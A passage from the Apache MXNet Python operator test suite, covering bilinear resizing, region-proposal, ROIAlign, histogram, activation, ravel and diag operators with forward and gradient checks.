y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_up')
elif mode == 'to_odd_down':
new_h = original_h if (original_h % 2) == 1 else original_h - 1
new_w = original_w if (original_w % 2) == 1 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_down')
elif mode == 'to_odd_up':
new_h = original_h if (original_h % 2) == 1 else original_h + 1
new_w = original_w if (original_w % 2) == 1 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_up')
elif mode == 'like':
x_1 = mx.nd.random.uniform(shape=shape_1)
new_h = x_1.shape[2]
new_w = x_1.shape[3]
y = mx.nd.contrib.BilinearResize2D(x, x_1, mode='like')
new_shape_desired = np.array([shape[0], shape[1], new_h, new_w], dtype='int')
new_shape_got = np.array(y.shape, dtype='int')
data_sym = mx.sym.var('data')
data_np = x.asnumpy()
expected = py_bilinear_resize(data_np, new_h, new_w)
out_grads = np.ones([shape[0], shape[1], new_h, new_w])
expected_backward = py_bilinear_resize_backward(data_np, out_grads, mode)
assert_array_equal(new_shape_desired, new_shape_got, "Desired and got shapes are not equal. {} vs {}".format(
str(new_shape_desired.tolist()), str(new_shape_got.tolist())))
assert_almost_equal(y.asnumpy(), expected, 1e-3, 0)
if mode != 'like':
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, None, scale_height=scale_height, scale_width=scale_width, mode=mode)
check_symbolic_forward(resize_sym, [data_np], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np], rtol=1e-2, atol=1e-4)
else:
data_sym_like = mx.sym.var('data_like')
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, data_sym_like, mode=mode)
date_np_like = x_1.asnumpy()
check_symbolic_forward(resize_sym, [data_np, date_np_like], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np, date_np_like], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np, date_np_like], rtol=1e-2, atol=1e-4)
shape = (2, 2, 10, 10)
check_bilinear_resize_op(shape, 5, 5)
check_bilinear_resize_op(shape, 10, 10)
check_bilinear_resize_op(shape, 15, 15)
check_bilinear_resize_op(shape, 3, 7)
check_bilinear_resize_op(shape, 13, 17)
shape = (2, 2, 20, 20)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape = (2, 2, 21, 21)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape_0 = (2, 2, 21, 21)
shape_1 = (2, 2, 10, 10)
check_bilinear_resize_modes_op(shape_0, shape_1=shape_1, mode='like')
check_bilinear_resize_modes_op(shape_1, shape_1=shape_0, mode='like')
def test_multi_proposal_op():
# paramters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
threshold = 0.7
rpn_min_size = 16
batch_size = 20
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = np.float32)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = np.float32)
im_info = mx.nd.empty((batch_size, 3), dtype = np.float32)
cls_prob = mx.nd.array(np.random.random(cls_prob.shape))
bbox_pred = mx.nd.array(np.random.random(bbox_pred.shape))
for i in range(batch_size):
im_size = np.random.randint(100, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(70, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
def get_sub(arr, i):
new_shape = list(arr.shape)
new_shape[0] = 1
res = arr[i].reshape(new_shape)
return res
def check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
single_proposal = []
single_score = []
for i in range(batch_size):
rois, score = mx.nd.contrib.Proposal(
cls_prob = get_sub(cls_prob, i),
bbox_pred = get_sub(bbox_pred, i),
im_info = get_sub(im_info, i),
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal.append(rois)
single_score.append(score)
multi_proposal, multi_score = mx.nd.contrib.MultiProposal(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal = mx.nd.stack(*single_proposal).reshape(multi_proposal.shape)
single_score = mx.nd.stack(*single_score).reshape(multi_score.shape)
single_proposal_np = single_proposal.asnumpy()
multi_proposal_np = multi_proposal.asnumpy()
single_score_np = single_score.asnumpy()
multi_score_np = multi_score.asnumpy()
# check rois x1,y1,x2,y2
assert np.allclose(single_proposal_np[:, 1:], multi_proposal_np[:, 1:])
# check rois batch_idx
for i in range(batch_size):
start = i * rpn_post_nms_top_n
end = start + rpn_post_nms_top_n
assert (multi_proposal_np[start:end, 0] == i).all()
# check score
assert np.allclose(single_score_np, multi_score_np)
def check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
im_info_sym = mx.sym.Variable('im_info')
cls_prob_sym = mx.sym.Variable('cls_prob')
bbox_pred_sym = mx.sym.Variable('bbox_pred')
sym = mx.sym.contrib.MultiProposal(
cls_prob = cls_prob_sym,
bbox_pred = bbox_pred_sym,
im_info = im_info_sym,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = False)
location = [cls_prob.asnumpy(), bbox_pred.asnumpy(), im_info.asnumpy()]
expected = [np.zeros_like(e) for e in location]
out_grads = [np.ones((rpn_post_nms_top_n, 5))]
check_symbolic_backward(sym, location, out_grads, expected)
check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
check_forward(rpn_pre_nms_top_n, 1500)
check_forward(1000, 500)
check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
@with_seed()
def test_quadratic_function():
def f(x, a, b, c):
return a * x**2 + b * x + c
a = np.random.random_sample()
b = np.random.random_sample()
c = np.random.random_sample()
data = mx.symbol.Variable('data')
quad_sym = mx.sym.contrib.quadratic(data=data, a=a, b=b, c=c)
for dtype in [np.float16, np.float32, np.float64]:
for ndim in range(1, 6):
shape = rand_shape_nd(ndim, 5)
data_np = np.random.randn(*shape).astype(dtype)
expected = f(data_np, a, b, c)
backward_expected = 2 * a * data_np + b
# check imperative forward
output = mx.nd.contrib.quadratic(mx.nd.array(data_np), a=a, b=b, c=c)
assert_almost_equal(output.asnumpy(),expected,
rtol=1e-2 if dtype is np.float16 else 1e-5,
atol=1e-2 if dtype is np.float16 else 1e-5)
# check forward
check_symbolic_forward(quad_sym, [data_np], [expected],
rtol=1e-2 if dtype is np.float16 else 1e-5,
atol=1e-2 if dtype is np.float16 else 1e-5)
# check backward
check_symbolic_backward(quad_sym, [data_np], [np.ones(expected.shape)],
[backward_expected],
rtol=1e-2 if dtype is np.float16 else 1e-5,
atol=1e-2 if dtype is np.float16 else 1e-5)
# check backward using finite difference
check_numeric_gradient(quad_sym, [data_np], atol=0.001)
@with_seed()
def test_histogram():
def f(x, bins=10, range=None):
return np.histogram(x, bins, range=range)
for ndim in range(1, 6):
shape = rand_shape_nd(ndim)
x = rand_ndarray(shape, stype='default', dtype=np.float64)
mx_bins = mx.nd.array([-1.0, 0.5, 2.0, 4.5, 50.0], dtype=np.float64)
np_bins = mx_bins.asnumpy()
bin_cnt = random.randint(2, 10)
bin_range = (-2.5, 2.5)
mx_histo1, mx_bins1 = mx.nd.histogram(x, bins=bin_cnt, range=bin_range)
np_histo1, np_bins1 = f(x.asnumpy(), bins=bin_cnt, range=bin_range)
assert_almost_equal(mx_bins1.asnumpy(), np_bins1)
assert_almost_equal(mx_histo1.asnumpy(), np_histo1, rtol=1e-3, atol=1e-5)
mx_histo2, mx_bins2 = mx.nd.histogram(x, bins=mx_bins)
np_histo2, np_bins2 = f(x.asnumpy(), bins=np_bins)
assert_almost_equal(mx_histo2.asnumpy(), np_histo2, rtol=1e-3, atol=1e-5)
assert_almost_equal(mx_bins2.asnumpy(), np_bins2, rtol=1e-3, atol=1e-5)
data = mx.sym.Variable("data")
bins = mx.sym.Variable("bins")
histo1 = mx.sym.histogram(a=data, bins=bin_cnt, range=bin_range)
histo2 = mx.sym.histogram(a=data, bins=bins)
executor1 = histo1.bind(ctx=default_context(), args={"data" : x})
executor1.forward(is_train=False)
assert_almost_equal(np_histo1, executor1.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo1", "FORWARD_histo1"), equal_nan=False)
executor2 = histo2.bind(ctx=default_context(), args={"data" : x, "bins" : mx_bins})
executor2.forward(is_train=False)
assert_almost_equal(np_histo2, executor2.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo2", "FORWARD_histo2"), equal_nan=False)
def test_op_output_names_monitor():
def check_name(op_sym, expected_names):
output_names = []
def get_output_names_callback(name, arr):
output_names.append(py_str(name))
op_exe = op_sym.simple_bind(ctx=mx.current_context(), grad_req='null')
op_exe.set_monitor_callback(get_output_names_callback, monitor_all=False)
try:
op_exe.forward()
mx.nd.waitall()
except mx.base.MXNetError:
# skip errors since test is to check output names
pass
for output_name, expected_name in zip(output_names, expected_names):
assert output_name == expected_name
is_windows = sys.platform.startswith('win')
if (is_windows):
# Windows doesn't support set environment variable on the fly, so disable it for now
pass
else:
# Disable subgraph in case subgraph will replace symbol
os.environ['MXNET_SUBGRAPH_BACKEND'] = "NONE"
data = mx.sym.Variable('data', shape=(10, 3, 10, 10))
conv_sym = mx.sym.Convolution(data, kernel=(2, 2), num_filter=1, name='conv')
check_name(conv_sym, ['conv_output'])
deconv_sym = mx.sym.Deconvolution(data, kernel=(2, 2), num_filter=1, name='deconv')
check_name(deconv_sym, ['deconv_output'])
fc_sym = mx.sym.FullyConnected(data, num_hidden=10, name='fc')
check_name(fc_sym, ['fc_output'])
lrn_sym = mx.sym.LRN(data, nsize=1, name='lrn')
check_name(lrn_sym, ['lrn_output', 'lrn_tmp_norm'])
act_sym = mx.sym.Activation(data, act_type='relu', name='act')
check_name(act_sym, ['act_output'])
cc_sym = mx.sym.concat(data, data, dim=0, name='concat')
check_name(cc_sym, ['concat_output'])
sm_sym = mx.sym.softmax(data, name='softmax')
check_name(sm_sym, ['softmax_output'])
sa_sym = mx.sym.SoftmaxActivation(data, name='softmax')
check_name(sa_sym, ['softmax_output'])
us_sym = mx.sym.UpSampling(data, scale=2, sample_type='nearest',
name='upsampling')
check_name(us_sym, ['upsampling_output'])
us_sym = mx.sym.Pooling(data, kernel=(2, 2), pool_type='avg',
name='pooling')
check_name(us_sym, ['pooling_output'])
del os.environ['MXNET_SUBGRAPH_BACKEND']
def test_op_all_names_monitor():
def check_name(op_sym, expected_names):
output_names = []
def get_output_names_callback(name, arr):
output_names.append(py_str(name))
op_exe = op_sym.simple_bind(ctx=mx.current_context(), grad_req='null')
op_exe.set_monitor_callback(get_output_names_callback, monitor_all=True)
try:
op_exe.forward()
mx.nd.waitall()
except mx.base.MXNetError:
# skip errors since test is to check all names
pass
for output_name, expected_name in zip(output_names, expected_names):
assert output_name == expected_name
is_windows = sys.platform.startswith('win')
if (is_windows):
# Windows doesn't support set environment variable on the fly, so disable it for now
pass
else:
# Disable subgraph in case subgraph will replace symbol
os.environ['MXNET_SUBGRAPH_BACKEND'] = "NONE"
data = mx.sym.Variable('data', shape=(10, 3, 10, 10))
conv_sym = mx.sym.Convolution(data, kernel=(2, 2), num_filter=1, name='conv')
check_name(conv_sym, ['data', 'conv_data', 'conv_weight', 'conv_weight', 'conv_bias', 'conv_bias', 'conv_output'])
deconv_sym = mx.sym.Deconvolution(data, kernel=(2, 2), num_filter=1, name='deconv')
check_name(deconv_sym, ['data', 'deconv_data', 'deconv_weight', 'deconv_weight', 'deconv_output'])
fc_sym = mx.sym.FullyConnected(data, num_hidden=10, name='fc')
check_name(fc_sym, ['data', 'fc_data', 'fc_weight', 'fc_weight', 'fc_bias', 'fc_bias', 'fc_output'])
lrn_sym = mx.sym.LRN(data, nsize=1, name='lrn')
check_name(lrn_sym, ['data', 'lrn_data', 'lrn_output', 'lrn_tmp_norm'])
act_sym = mx.sym.Activation(data, act_type='relu', name='act')
check_name(act_sym, ['data', 'act_input0', 'act_output'])
cc_sym = mx.sym.concat(data, data, dim=0, name='concat')
check_name(cc_sym, ['data', 'concat_arg0', 'data', 'concat_arg1', 'concat_output'])
sm_sym = mx.sym.softmax(data, name='softmax')
check_name(sm_sym, ['data', 'softmax_data', 'softmax_output'])
length = mx.sym.Variable("length", shape=(10, 10, 10))
sm_sym = mx.sym.softmax(data, length, axis=1, use_length=True, name='softmax')
check_name(sm_sym, ['data', 'softmax_data', 'length', 'softmax_length', 'softmax_output'])
sa_sym = mx.sym.SoftmaxActivation(data, name='softmax')
check_name(sa_sym, ['data', 'softmax_input0', 'softmax_output'])
us_sym = mx.sym.UpSampling(data, scale=2, sample_type='nearest',
name='upsampling')
check_name(us_sym, ['data', 'upsampling_arg0', 'upsampling_output'])
us_sym = mx.sym.Pooling(data, kernel=(2, 2), pool_type='avg',
name='pooling')
check_name(us_sym, ['data', 'pooling_data', 'pooling_output'])
del os.environ['MXNET_SUBGRAPH_BACKEND']
@with_seed()
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/13915")
def test_activation():
shapes = [(9,), (9, 10), (9, 10, 10), (1, 9, 10, 10)]
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'relu': [lambda x: mx.sym.Activation(x, act_type='relu'),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'sigmoid': [lambda x: mx.sym.Activation(x, act_type='sigmoid'),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'tanh': [lambda x: mx.sym.Activation(x, act_type='tanh'),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'softrelu': [lambda x: mx.sym.Activation(x, act_type='softrelu'),
lambda x: np.log(1. + np.exp(x)),
lambda x: 1. - 1 / (1 + np.exp(x)),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.Activation(x, act_type='softsign'),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
}
# Loop over operators
for name, op in unary_ops.items():
# Loop over shapes
for shape in shapes:
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
@with_seed()
def test_ravel():
# be aware that check_symbolic_forward will use float type internally
# for the arrays and that limits the representable flat index range.
# Taking dim==4 and a range of [0,..,100] for the data can already
# cause precision issues and break this test.
for dim in [1, 2, 3, 4]:
data = np.random.randint(50, size=(dim, 500))
shape = tuple(np.add(np.amax(data, axis=1), [1]))
a = mx.sym.Variable('a')
ravel_npy = np.ravel_multi_index(data, shape)
b = mx.sym.ravel_multi_index(a, shape=shape)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
# Test with leading dimension set to -1.
shape2 = shape
shape2 = (-1,)+shape[1:]
b = mx.sym.ravel_multi_index(a, shape=shape2)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape2)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
def test_context_num_gpus():
try:
# Note: the test is run both on GPU and CPU hosts, so that we can not assert
# on a specific number here.
assert mx.context.num_gpus() >= 0
except mx.MXNetError as e:
# Note: On a CPU only host CUDA sometimes is not able to determine the number
# of GPUs
if str(e).find("CUDA") == -1:
raise e
@with_seed()
def test_op_roi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
Assert whether the two data type are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0), []
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
grad = [(y_low, x_low, w1), (y_low, x_high, w2),
(y_high, x_low, w3), (y_high, x_high, w4)
]
return val, grad
def roialign_forward_backward(data, rois, pooled_size, spatial_scale, sampling_ratio,
position_sensitive, dy):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 5,\
ValueError(
'The length of the axis 1 of rois should be 5 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
C_out = C // PH // PW if position_sensitive else C
out = np.zeros((R, C_out, PH, PW), dtype=T)
dx = np.zeros_like(data)
drois = np.zeros_like(rois)
for r in range(R):
batch_ind = int(rois[r, 0])
sw, sh, ew, eh = rois[r, 1:5] * T(spatial_scale)
roi_w = T(max(ew - sw, 1.0))
roi_h = T(max(eh - sh, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
for c in range(C_out):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
c_in = c * PH * PW + ph * PW + pw if position_sensitive else c
for iy in range(roi_bin_grid_h):
y = sh + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
x = sw + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
v, g = bilinear_interpolate(
bdata[c_in], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
# compute grad
for qy, qx, qw in g:
assert_same_dtype(qw.dtype, T)
dx[batch_ind, c_in, qy, qx] += dy[r,
c, ph, pw] * qw / count
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out, [dx, drois]
def test_roi_align_value(sampling_ratio=0, position_sensitive=False):
ctx = default_context()
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
C = C * pooled_size[0] * pooled_size[1] if position_sensitive else C
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy - wh / 2, center_xy + wh / 2, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
data.attach_grad()
rois.attach_grad()
with mx.autograd.record():
output = mx.nd.contrib.ROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sample_ratio=sampling_ratio,
position_sensitive=position_sensitive)
C_out = C // pooled_size[0] // pooled_size[1] if position_sensitive else C
dy = mx.nd.random.uniform(-1, 1, (R, C_out) +
pooled_size, ctx=ctx, dtype=dtype)
output.backward(dy)
real_output, [dx, drois] = roialign_forward_backward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio,
position_sensitive, dy.asnumpy())
assert_almost_equal(output.asnumpy(), real_output, atol=1e-3)
assert_almost_equal(data.grad.asnumpy(), dx, atol=1e-3)
assert_almost_equal(rois.grad.asnumpy(), drois, atol=1e-3)
# modified from test_roipooling()
def test_roi_align_autograd(sampling_ratio=0):
ctx = default_context()
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.contrib.ROIAlign(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1,
sample_ratio=sampling_ratio)
x1 = np.random.rand(4, 1, 12, 12).astype('float64')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2],
[1, 3.1, 1.1, 5.2, 10.2]], dtype='float64')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'write', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'add', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
test_roi_align_value()
test_roi_align_value(sampling_ratio=2)
test_roi_align_value(position_sensitive=True)
test_roi_align_autograd()
@with_seed()
def test_op_rroi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
Assert whether the two data type are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0)
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
return val
def rroialign_forward(data, rois, pooled_size, spatial_scale, sampling_ratio):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 6,\
ValueError(
'The length of the axis 1 of rois should be 6 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
out = np.zeros((R, C, PH, PW), dtype=T)
for r in range(R):
batch_ind = int(rois[r, 0])
roi_center_w, roi_center_h, roi_w, roi_h = rois[r, 1:5] * T(spatial_scale)
roi_theta = T(rois[r,5] * np.pi / 180.0)
roi_w = T(max(roi_w, 1.0))
roi_h = T(max(roi_h, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
roi_start_h = T(-roi_h / 2.0)
roi_start_w = T(-roi_w / 2.0)
for c in range(C):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
for iy in range(roi_bin_grid_h):
yy = roi_start_h + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
xx = roi_start_w + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
x = xx * np.cos(roi_theta, dtype=T) + yy * np.sin(roi_theta, dtype=T) + roi_center_w
y = yy * np.cos(roi_theta, dtype=T) - xx * np.sin(roi_theta, dtype=T) + roi_center_h
v = bilinear_interpolate(
bdata[c], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out
def test_rroi_align_value(sampling_ratio=-1):
ctx = default_context()
if ctx.device_type == 'gpu':
print('skipped testing rroi align for gpu since it is not supported yet')
return
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
theta = mx.nd.random.uniform(0, 180, (R,1), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy, wh, theta, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
output = mx.nd.contrib.RROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sampling_ratio=sampling_ratio)
real_output = rroialign_forward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio)
assert_almost_equal(output.asnumpy(), real_output, atol=1e-3)
test_rroi_align_value()
test_rroi_align_value(sampling_ratio=2)
@with_seed()
def test_diag():
# Test 2d input
h = np.random.randint(2,9)
w = np.random.randint(2,9)
a_np = np.random.random((h, w)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
# k == 0
r = mx.nd.diag(a)
assert_almost_equal(r.asnumpy(), np.diag(a_np))
# k == 1
k = 1
r = mx.nd.diag(a, k=k)
assert_almost_equal(r.asnumpy(), np.diag(a_np, k=k))
# k == -1
k = -1
r = mx.nd.diag(a, k=k)
assert_almost_equal(r.asnumpy(), np.diag(a_np, k=k))
# random k
k = np.random.randint(-min(h,w) + 1, min(h,w))
r = mx.nd.diag(a, k=k)
assert_almost_equal(r.asnumpy(), np.diag(a_np, k=k))
# invalid k
k = max(h,w) + 1
assertRaises(MXNetError, mx.nd.diag, a, k=k)
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# test 1d input
d = np.random.randint(2,9)
a_np = np.random.random((d))
a = mx.nd.array(a_np)
# k is random
k = np.random.randint(-d,d)
r = mx.nd.diag(a, k=k)
assert_almost_equal(r.asnumpy(), np.diag(a_np, k=k))
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
